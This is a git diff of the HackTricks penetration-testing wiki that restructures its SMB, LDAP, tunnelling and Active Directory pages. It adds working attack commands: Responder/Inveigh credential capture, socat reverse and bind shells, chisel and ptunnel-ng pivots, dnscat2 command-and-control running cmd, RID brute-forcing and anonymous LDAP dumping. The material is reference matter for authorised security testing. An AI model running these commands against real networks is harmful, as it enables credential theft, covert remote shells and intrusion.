diff --git a/SUMMARY.md b/SUMMARY.md index 2d75203c5..2c4a2c0d9 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -364,7 +364,8 @@ * [123/udp - Pentesting NTP](network-services-pentesting/pentesting-ntp.md) * [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md) * [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md) -* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb.md) +* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md) + * [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md) * [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md) * [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md) * [Cisco SNMP](network-services-pentesting/pentesting-snmp/cisco-snmp.md) diff --git a/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index 7de02a8fc..aade20608 100644 --- a/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -138,7 +138,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs` -### DHCP Poisoning +#### Responder - DHCP Poisoning Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution. @@ -152,7 +152,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier ./Responder.py -I eth0 -Pdv ``` -### Capturing credentials +#### Responder - Capturing credentials Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**): @@ -164,11 +164,23 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS. > Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. -[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder.\ +[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder. There is a [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) **** that lists all parameters and usage instructions.\ Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero). ![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png) +Or run it with more options: + +```powershell +Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y +``` + +Or run the C# version: + +```bash +Inveigh.exe +``` + ## NTML Relay Attack This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**. diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index 9d9ac362d..9a856d798 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md @@ -202,22 +202,6 @@ rportfwd_local [bind port] [forward host] [forward port] rportfwd_local stop [bind port] ``` -## Windows netsh - -### Port2Port - -You need to be a local admin (for any port) - -```bash -netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp -# Example: -netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444 -# Check the port forward was created: -netsh interface portproxy show v4tov4 -# Delete port forward -netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444 -``` - ## reGeorg [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) @@ -236,16 +220,19 @@ You need to use the **same version for client and server** ### socks ```bash -./chisel server -p 8080 --reverse #Server -./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client +./chisel server -p 8080 --reverse #Server -- Attacker +./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim #And now you can use proxychains with port 1080 (default) + +./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed) +./chisel client -v 10.10.10.10:8080 socks #Attacker ``` ### Port forwarding ```bash -./chisel_1.7.6_linux_amd64 server -p 12312 --reverse -./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 +./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker +./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim ``` ## Rpivot @@ -281,7 +268,7 @@ victim> python client.py --server-ip --server-port 9999 --ntl ```bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane -attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 +attacker> socat FILE:`tty`,raw,echo=0 TCP4::1337 ``` ### Reverse shell @@ -294,13 +281,13 @@ victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane ### Port2Port ```bash -socat TCP-LISTEN:,fork TCP:: & +socat TCP4-LISTEN:,fork TCP4:: & ``` ### Port2Port through socks ```bash -socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 +socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 ``` ### Meterpreter through SSL Socat @@ -364,6 +351,53 @@ echo y | plink.exe -l -pw [-p ] -R < echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 ``` +## Windows netsh + +### Port2Port + +You need to be a local admin (for any port) + +```bash +netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp +# Example: +netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444 +# Check the port forward was created: +netsh interface portproxy show v4tov4 +# Delete port forward +netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444 +``` + +## SocksOverRDP & Proxifier + +You need to have **RDP access over the system**.\ +Download: + +1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**. +2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab) + +In your client computer load **`SocksOverRDP-Plugin.dll`** like this: + +```bash +# Load SocksOverRDP.dll using regsvr32.exe +C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll +``` + +Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**. + +**Connect** via **RDP** and upload & execute in the victim machine the **`SocksOverRDP-Server.exe` ** binary: + +``` +C:\SocksOverRDP-x64> SocksOverRDP-Server.exe +``` + +Now, confirm in you machine (attacker) that the port 1080 is listening: + +``` +netstat -antb | findstr 1080 +``` + +Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.** + ## Proxify Windows GUI Apps You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\ @@ -423,14 +457,29 @@ ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080 ### DNSCat2 +****[**Download it from here**](https://github.com/iagox86/dnscat2)**.** + Establishes a C\&C channel through DNS. It doesn't need root privileges. ```bash attacker> ruby ./dnscat2.rb tunneldomain.com victim> ./dnscat2 tunneldomain.com + +# If using it in an internal network for a CTF: +attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache +victim> ./dnscat2 --dns host=10.10.10.10,port=5353 ``` -**Port forwarding with dnscat** +#### **In PowerShell** + +You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell: + +``` +Import-Module .\dnscat2.ps1 +Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd +``` + +#### **Port forwarding with dnscat** ```bash session -i @@ -460,11 +509,28 @@ Root is needed in both systems to create tun adapters and tunnel data between th ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ``` +### ptunnel-ng + +****[**Download it from here**](https://github.com/utoni/ptunnel-ng.git). + +```bash +# Generate it +sudo ./autogen.sh + +# Server -- victim (needs to be able to receive ICMP) +sudo ptunnel-ng +# Client - Attacker +sudo ptunnel-ng -p -l -r -R +# Try to connect with SSH through ICMP tunnel +ssh -p 2222 -l user 127.0.0.1 +# Create a socks proxy through the SSH connection through the ICMP tunnel +ssh -D 9050 -p 2222 -l user 127.0.0.1 +``` + ## Other tools to check * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) -* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
diff --git a/network-services-pentesting/pentesting-ldap.md b/network-services-pentesting/pentesting-ldap.md index 66812a2c2..c85a23796 100644 --- a/network-services-pentesting/pentesting-ldap.md +++ b/network-services-pentesting/pentesting-ldap.md @@ -142,7 +142,7 @@ u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/) -## Clear text credentials +## Sniff clear text credentials If LDAP is used without SSL you can **sniff credentials in plain text** in the network. @@ -150,7 +150,9 @@ Also, you can perform a **MITM** attack in the network **between the LDAP server **If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again. -## Bypass TLS SNI check +## Anonymous Access + +### Bypass TLS SNI check According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user: @@ -158,6 +160,11 @@ According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrar ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + ``` +### LDAP anonymous binds + +[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests. \ +However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD. + ## Valid Credentials If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using: diff --git a/network-services-pentesting/pentesting-smb.md b/network-services-pentesting/pentesting-smb/README.md similarity index 76% rename from network-services-pentesting/pentesting-smb.md rename to network-services-pentesting/pentesting-smb/README.md index 84ed7f2c0..c3f94215e 100644 --- a/network-services-pentesting/pentesting-smb.md +++ b/network-services-pentesting/pentesting-smb/README.md @@ -51,7 +51,7 @@ With an anonymous null session you can access the IPC$ share and interact with s ## What is NTLM -If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../windows-hardening/ntlm/). +If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../../windows-hardening/ntlm/). ## **Enumeration** @@ -66,7 +66,7 @@ nbtscan -r 192.168.0.1/24 To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can: * Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version** -* \_Or\*\* this script\*\*: +* Or this script: ```bash #!/bin/sh @@ -127,80 +127,23 @@ rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbff /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@] ``` -### **Enumerating LSARPC and SAMR rpcclient** - -**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"** - -You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** (often requiring credentials). - -#### Server Info - -* **Server Info**: `srvinfo` - -#### Users enumeration - -* **List users**: `querydispinfo` and `enumdomusers` -* **Get user details**: `queryuser <0xrid>` -* **Get user groups**: `queryusergroups <0xrid>` -* **GET SID of a user**: `lookupnames ` -* **Get users aliases**: `queryuseraliases [builtin|domain] ` +### Enumerate Users ```bash -# Brute-Force users RIDs -for i in $(seq 500 1100); do - rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; -done +# This info should alerady being gathered from enum4linux and enum4linux-ng +crackmapexec smb 10.10.10.10 --users -# You can also use samrdump.py for this purpose +ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " " + +rpcclient -U "" -N 10.10.10.10 +enumdomusers ``` -#### Groups enumeration +### **Enumerating LSARPC and SAMR rpcclient** -* **List groups**: `enumdomgroups` -* **Get group details**: `querygroup <0xrid>` -* **Get group members**: `querygroupmem <0xrid>` - -#### Aliasgroups enumeration - -* **List alias**: `enumalsgroups ` -* **Get members**: `queryaliasmem builtin|domain <0xrid>` - -#### Domains enumeration - -* **List domains**: `enumdomains` -* **Get SID**: `lsaquery` -* **Domain info**: `querydominfo` - -#### Shares enumeration - -* **Enumerate all available shares**: `netshareenumall` -* **Info about a share**: `netsharegetinfo ` - -#### More SIDs - -* **Find SIDs by name**: `lookupnames ` -* **Find more SIDs**: `lsaenumsid` -* **RID cycling (check more SIDs)**: `lookupsids ` - -#### **Extra commands** - -| **Command** | **Interface** | **Description** | -| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- | -| queryuser | SAMR | Retrieve user information | -| querygroup | Retrieve group information | | -| querydominfo | Retrieve domain information | | -| enumdomusers | Enumerate domain users | | -| enumdomgroups | Enumerate domain groups | | -| createdomuser | Create a domain user | | -| deletedomuser | Delete a domain user | | -| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values | -| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | | -| lsaaddacctrights | Add rights to a user account | | -| lsaremoveacctrights | Remove rights from a user account | | -| dsroledominfo | LSARPC-DS | Get primary domain information | -| dsenumdomtrusts | Enumerate trusted domains within an AD forest | | - -To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](135-pentesting-msrpc.md). +{% content-ref url="rpcclient-enumeration.md" %} +[rpcclient-enumeration.md](rpcclient-enumeration.md) +{% endcontent-ref %} ### GUI connection from linux @@ -410,10 +353,10 @@ crackmapexec smb -d -u Administrator -p 'password' --pass-pol #Get crackmapexec smb -d -u Administrator -p 'password' --rid-brute #RID brute ``` -### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md) +### [**psexec**](../../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/ntlm/smbexec.md) Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\ -**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\ +**More info** about [**psexec** ](../../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/ntlm/smbexec.md).\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ ```bash @@ -426,7 +369,7 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM** -### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec +### [wmiexec](../../windows-hardening/ntlm/wmicexec.md)/dcomexec Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ @@ -447,7 +390,7 @@ Using **parameter**`-k` you can authenticate against **kerberos** instead of **N #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` -### [AtExec](../windows-hardening/ntlm/atexec.md) +### [AtExec](../../windows-hardening/ntlm/atexec.md) Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ @@ -473,7 +416,7 @@ ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid ## SMB relay attack This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\ -[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ## SMB-Trap @@ -488,17 +431,17 @@ This happens with the functions: Which are used by some browsers and tools (like Skype) -![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>) +![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (93).png>) ### SMBTrap using MitMf -![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>) +![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (94).png>) ## NTLM Theft -Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack). +Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](./#smb-relay-attack). -[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) +[See: ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md new file mode 100644 index 000000000..30eb7f407 --- /dev/null +++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md @@ -0,0 +1,98 @@ +# rpcclient enumeration + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"** + +You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** (often requiring credentials). + +#### Server Info + +* **Server Info**: `srvinfo` + +#### Users enumeration + +* **List users**: `querydispinfo` and `enumdomusers` +* **Get user details**: `queryuser <0xrid>` +* **Get user groups**: `queryusergroups <0xrid>` +* **GET SID of a user**: `lookupnames ` +* **Get users aliases**: `queryuseraliases [builtin|domain] ` + +```bash +# Brute-Force users RIDs +for i in $(seq 500 1100); do + rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; +done + +# You can also use samrdump.py for this purpose +``` + +#### Groups enumeration + +* **List groups**: `enumdomgroups` +* **Get group details**: `querygroup <0xrid>` +* **Get group members**: `querygroupmem <0xrid>` + +#### Aliasgroups enumeration + +* **List alias**: `enumalsgroups ` +* **Get members**: `queryaliasmem builtin|domain <0xrid>` + +#### Domains enumeration + +* **List domains**: `enumdomains` +* **Get SID**: `lsaquery` +* **Domain info**: `querydominfo` + +#### Shares enumeration + +* **Enumerate all available shares**: `netshareenumall` +* **Info about a share**: `netsharegetinfo ` + +#### More SIDs + +* **Find SIDs by name**: `lookupnames ` +* **Find more SIDs**: `lsaenumsid` +* **RID cycling (check more SIDs)**: `lookupsids ` + +#### **Extra commands** + +| **Command** | **Interface** | **Description** | +| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- | +| queryuser | SAMR | Retrieve user information | +| querygroup | Retrieve group information | | +| querydominfo | Retrieve domain information | | +| enumdomusers | Enumerate domain users | | +| enumdomgroups | Enumerate domain groups | | +| createdomuser | Create a domain user | | +| deletedomuser | Delete a domain user | | +| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values | +| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | | +| lsaaddacctrights | Add rights to a user account | | +| lsaremoveacctrights | Remove rights from a user account | | +| dsroledominfo | LSARPC-DS | Get primary domain information | +| dsenumdomtrusts | Enumerate trusted domains within an AD forest | | + +To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md). + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md index 0b6d85315..6f76ea19f 100644 --- a/windows-hardening/active-directory-methodology/README.md +++ b/windows-hardening/active-directory-methodology/README.md @@ -60,10 +60,20 @@ If you just have access to an AD environment but you don't have any credentials/ * `enum4linux -a -u "" -p "" && enum4linux -a -u "guest" -p "" ` * `smbmap -u "" -p "" -P 445 -H && smbmap -u "guest" -p "" -P 445 -H ` * `smbclient -U '%' -L // && smbclient -U 'guest%' -L //` - * [**A more detailed guide on how to enumerate a SMB server can be found here.**](../../network-services-pentesting/pentesting-smb.md) + * A more detailed guide on how to enumerate a SMB server can be found here: + +{% content-ref url="../../network-services-pentesting/pentesting-smb/" %} +[pentesting-smb](../../network-services-pentesting/pentesting-smb/) +{% endcontent-ref %} + * **Enumerate Ldap** * `nmap -n -sV --script "ldap* and not brute" -p 389 ` - * [**A more detailed guide on how to enumerate LDAP can be found here.**](../../network-services-pentesting/pentesting-ldap.md) + * A more detailed guide on how to enumerate LDAP can be found here (pay **special attention to the anonymous access**): + +{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %} +[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md) +{% endcontent-ref %} + * **Poison the network** * Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) * Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack) diff --git a/windows-hardening/active-directory-methodology/pass-the-ticket.md b/windows-hardening/active-directory-methodology/pass-the-ticket.md index ca8a9570c..1721d52ae 100644 --- a/windows-hardening/active-directory-methodology/pass-the-ticket.md +++ b/windows-hardening/active-directory-methodology/pass-the-ticket.md @@ -59,6 +59,10 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket ``` {% endcode %} +## References + +* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) + **Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. diff --git a/windows-hardening/active-directory-methodology/password-spraying.md b/windows-hardening/active-directory-methodology/password-spraying.md index 07a3ad798..8806dc930 100644 --- a/windows-hardening/active-directory-methodology/password-spraying.md +++ b/windows-hardening/active-directory-methodology/password-spraying.md @@ -23,11 +23,24 @@ Notice that you **could lockout some accounts if you try several wrong passwords ### Get password policy -If you have some user credentials or a shell as a domain user you can get the password policy with: +If you have some user credentials or a shell as a domain user you can **get the password policy with**: -* `crackmapexec -u 'user' -p 'password' --pass-pol` -* `enum4linx -u 'username' -p 'password' -P ` -* `(Get-DomainPolicy)."SystemAccess" #From powerview` +```bash +# From Linux +crackmapexec -u 'user' -p 'password' --pass-pol + +enum4linx -u 'username' -p 'password' -P + +rpcclient -U "" -N 10.10.10.10; +rpcclient $>querydominfo + +ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength + +# From Windows +net accounts + +(Get-DomainPolicy)."SystemAccess" #From powerview +``` ### Exploitation diff --git a/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md index cfdcb023e..388cb27e4 100644 --- a/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md +++ b/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md @@ -261,8 +261,11 @@ As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/ab Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names. -After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\ +After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack. +{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} +[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +{% endcontent-ref %} ## **AD Recycle Bin**